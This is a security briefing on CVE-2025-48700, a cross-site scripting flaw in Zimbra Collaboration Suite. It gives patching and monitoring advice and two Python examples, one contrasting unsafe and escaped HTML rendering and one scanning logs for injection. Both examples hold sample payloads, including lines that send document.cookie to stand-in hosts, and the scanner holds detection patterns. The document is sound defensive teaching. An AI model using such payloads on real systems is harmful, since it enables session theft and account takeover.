[KEV] CVE-2025-48700 -- CVSS 0.0 Vulnerability Briefing
[KEV] CVE-2025-48700 | CVSS 0.0 (unscored) | Exploit: Operational
What Is It
CVE-2025-48700 is a stored or reflected cross-site scripting (XSS) vulnerability in Synacor Zimbra Collaboration Suite (ZCS), a widely deployed enterprise email and collaboration platform.
Technical Detail
The flaw allows an attacker to inject and execute arbitrary JavaScript within the context of an authenticated user's browser session. Exploitation likely involves delivering crafted input through a mail message, calendar item, or another user-facing ZCS component that fails to sanitize or output-encode the value before rendering it in the browser; in the stored case the payload runs as soon as the recipient views the affected item, with no further interaction. Because the script runs with the victim's session, successful exploitation can result in session token theft, credential harvesting, unauthorized access to mailbox contents, actions performed in the victim's name, or a foothold for further movement within the organization. The impact scales with the privileges of the targeted user, so an administrator's session is the worst case.
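The encoding defect described above, as an added example that is not Zimbra's code and not taken from the advisory: the page does not identify the specific ZCS sink, so the "mail viewer" below is a hypothetical server-side renderer that builds an HTML fragment from a sender display name the attacker controls. The unsafe and hardened versions sit side by side, and a small stdlib-parser check shows how each output tokenizes. Both payloads are constructed samples.

```python
"""Added example for this briefing, not Zimbra code: the generic output-encoding
defect behind a stored or reflected XSS, beside the hardened form. The 'mail
viewer' is hypothetical; it renders a sender display name that the attacker
controls into an HTML fragment. Both payloads below are constructed samples."""
import html
from html.parser import HTMLParser

# Constructed inputs: one benign, one aimed at the element body, one at the attribute.
SENDER_PLAIN = "Alice Example"
SENDER_BODY_PAYLOAD = "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"
SENDER_ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'


def render_unsafe(display_name):
    """Vulnerable: untrusted text is concatenated straight into markup."""
    return f'<span class="from" title="{display_name}">{display_name}</span>'


def render_safe(display_name):
    """Hardened: HTML-encode before insertion. quote=True also encodes " and ',
    which is what keeps the attribute context closed against the second payload."""
    enc = html.escape(display_name, quote=True)
    return f'<span class="from" title="{enc}">{enc}</span>'


class _TagCollector(HTMLParser):
    """Records each start tag and its attribute names, roughly as a browser tokenizer would."""

    def __init__(self):
        super().__init__()
        self.seen = []

    def handle_starttag(self, tag, attrs):
        self.seen.append((tag, [name for name, _ in attrs]))


def elements(fragment):
    """List of (tag, [attribute names]) for every start tag the parser finds."""
    p = _TagCollector()
    p.feed(fragment)
    p.close()
    return p.seen


def is_clean(fragment):
    """True only if the fragment tokenizes to exactly the one span the template wrote,
    with exactly its two attributes: no extra element, no extra attribute."""
    return elements(fragment) == [("span", ["class", "title"])]


if __name__ == "__main__":
    for label, payload in (("plain", SENDER_PLAIN), ("body", SENDER_BODY_PAYLOAD), ("attr", SENDER_ATTR_PAYLOAD)):
        print(f"{label:5} unsafe clean={is_clean(render_unsafe(payload))!s:5} "
              f"safe clean={is_clean(render_safe(payload))}")
```

The attribute payload contains no `<` at all, which is why a filter that only strips tags misses it; the encoder handles both contexts because it escapes quotes as well as angle brackets. This covers HTML text and quoted-attribute contexts only; a value inserted into a `<script>` block, a URL, or a style attribute needs the encoder for that context instead.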
Exploitation Status
CISA has confirmed active exploitation in the wild, adding this vulnerability to the Known Exploited Vulnerabilities catalog on April 20, 2026. The exploit maturity is rated Operational, meaning functional exploit code exists and is being used in real-world attacks, not merely demonstrated in a controlled research context. Organizations running unpatched ZCS instances should treat this as an immediate priority.
Who Is Targeting This
No specific threat actor attribution has been confirmed at this time. Zimbra vulnerabilities have historically attracted interest from espionage-motivated actors and financially motivated groups due to the sensitive nature of email data, but no named group has been formally attributed to exploitation of this specific CVE as of April 21, 2026.
What To Do
Apply the vendor-supplied patch for Zimbra Collaboration Suite immediately. Per CISA's Known Exploited Vulnerabilities catalog, federal agencies operating under BOD 22-01 are required to remediate this vulnerability by the deadline associated with the April 20, 2026 KEV listing. All organizations should treat this as a high-priority patch regardless of the currently unscored CVSS rating: the KEV listing and operational exploit maturity are a more accurate risk signal than the score alone.

If patching cannot be completed immediately, consider restricting access to the ZCS web interface to trusted IP ranges, enforcing multi-factor authentication on all accounts, and monitoring web application logs for script injection patterns (HTML tags, event-handler attributes or javascript: URLs in request parameters, including URL-encoded and double-encoded forms) and for unexpected session activity such as one auth token presented from several client addresses. Note the limits of these measures: if the payload arrives in inbound mail, IP restrictions and MFA do not stop it from rendering in a legitimate user's browser, so they reduce exposure rather than remove it. After patching, consider invalidating active sessions, since any session tokens stolen before the fix remain usable until they expire or are revoked.

Review ZCS release notes and the Synacor security advisory for specific version guidance and any available workarounds.
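The log monitoring suggested above, as an added example (not Zimbra, Synacor or CISA tooling): it scans reverse-proxy access logs for URL-decoded injection indicators and for an auth token reused from more than one client address. The log format is an assumption: nginx "combined" lines plus one trailing field holding a hash of the client's ZM_AUTH_TOKEN cookie, which is an assumed proxy configuration, not a Zimbra default. The sample lines are constructed, not captured traffic.

```python
"""Log-scanning example added to this briefing; it is not Zimbra, Synacor or CISA
tooling. Assumed log format: nginx 'combined' lines from a reverse proxy in
front of ZCS, plus one trailing field holding a hash of the client's
ZM_AUTH_TOKEN cookie (assumed proxy configuration, so sessions can be
correlated without logging the raw token). All sample lines are constructed."""
import re
import urllib.parse
from collections import defaultdict

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" (?P<tok>\S+)$'
)

# Broad indicators checked against the URL-decoded request target.
# They surface candidates for review; they are not a precise signature.
XSS_INDICATORS = [
    ("script_tag", re.compile(r"<\s*script", re.I)),
    ("handler_tag", re.compile(r"<\s*(svg|img|iframe|body|object|embed)\b", re.I)),
    ("event_handler", re.compile(r"\bon(error|load|click|mouseover|focus|animationstart)\s*=", re.I)),
    ("javascript_url", re.compile(r"javascript\s*:", re.I)),
    ("cookie_access", re.compile(r"document\.cookie", re.I)),
]


def decode_target(target, rounds=3):
    """URL-decode repeatedly, bounded, so double-encoded payloads are not missed."""
    cur = target
    for _ in range(rounds):
        nxt = urllib.parse.unquote_plus(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur


def find_xss_indicators(target):
    """Names of the indicators that match the decoded target, in XSS_INDICATORS order."""
    decoded = decode_target(target)
    return [name for name, rx in XSS_INDICATORS if rx.search(decoded)]


def scan(lines):
    """Return (hits, shared_tokens, unparsed).

    hits: one dict per request whose decoded target matched at least one indicator.
    shared_tokens: {token: sorted client IPs} for tokens seen from more than one IP,
        a cheap signal that a stolen session is being replayed from elsewhere.
    unparsed: number of lines that did not match the expected format.
    """
    hits, unparsed = [], 0
    token_ips = defaultdict(set)
    for raw in lines:
        m = LOG_LINE.match(raw.rstrip("\n"))
        if not m:
            unparsed += 1
            continue
        token_ips[m["tok"]].add(m["ip"])
        found = find_xss_indicators(m["target"])
        if found:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                         "target": m["target"], "indicators": found})
    shared = {tok: sorted(ips) for tok, ips in token_ips.items() if len(ips) > 1}
    return hits, shared, unparsed


# Constructed sample traffic: a benign search, a single-encoded payload, a
# double-encoded payload, the same token reused from a second address, and one
# line that does not fit the format at all.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Apr/2026:10:01:12 +0000] "GET /zimbra/h/search?st=message&sq=test HTTP/1.1" 200 4321 "-" "Mozilla/5.0" tok_a1',
    '203.0.113.7 - - [20/Apr/2026:10:01:40 +0000] "GET /zimbra/h/search?sq=%3Cimg%20src%3Dx%20onerror%3Dfetch(%27//evil.example/%27%2Bdocument.cookie)%3E HTTP/1.1" 200 4321 "-" "Mozilla/5.0" tok_a1',
    '198.51.100.9 - - [20/Apr/2026:10:02:05 +0000] "GET /zimbra/h/search?sq=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 4321 "-" "curl/8.4.0" tok_b2',
    '192.0.2.44 - - [20/Apr/2026:10:03:30 +0000] "GET /zimbra/h/inbox HTTP/1.1" 200 9876 "-" "Mozilla/5.0" tok_a1',
    'garbage line that does not match the format',
]

if __name__ == "__main__":
    hits, shared, unparsed = scan(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['ip']} {h['status']} {','.join(h['indicators'])} {h['target']}")
    for tok, ips in shared.items():
        print(f"token {tok} seen from {', '.join(ips)}")
    print(f"unparsed lines: {unparsed}")
```

Access logs only show what travels in the URL, so this catches reflected attempts and probing; a stored payload that arrives over SMTP never appears here, which is why the same indicators are worth running over inbound message content as well. Treat the shared-token signal as a prompt to check, not proof: legitimate users change addresses too.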